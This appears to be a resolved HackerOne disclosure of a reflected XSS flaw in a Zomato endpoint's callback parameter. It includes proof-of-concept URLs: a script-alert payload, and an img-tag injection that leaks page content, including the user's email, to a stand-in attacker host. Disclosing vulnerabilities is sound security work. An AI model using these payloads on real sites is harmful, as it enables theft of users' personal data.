Reflected Cross-Site Scripting in www.zomato.com/php/instagram_tag_relay
Unknown
Vulnerability Details
`https://www.zomato.com/php/instagram_tag_relay` is vulnerable to XSS via the `callback` parameter (both POST and GET).
PoC:
`https://www.zomato.com/php/instagram_tag_relay?callback=%3Cscript%3Ealert(document.domain)%3C/script%3E`
In addition, when a Zomato user accesses the page after having connected his Zomato account to Instagram, the page contains sensitive data (such as the user's email address). An attacker can use the vulnerability to access this data.
PoC:
`https://www.zomato.com/php/instagram_tag_relay?callback=><img+src%3dhttps%3a//example.org/%3f`
(causes the victim's browser to send a request to the attacker's server `example.org`, leaking the page's content).
Actions
View on HackerOneReport Stats
- Report ID: 138262
- State: Closed
- Substate: resolved
- Upvotes: 4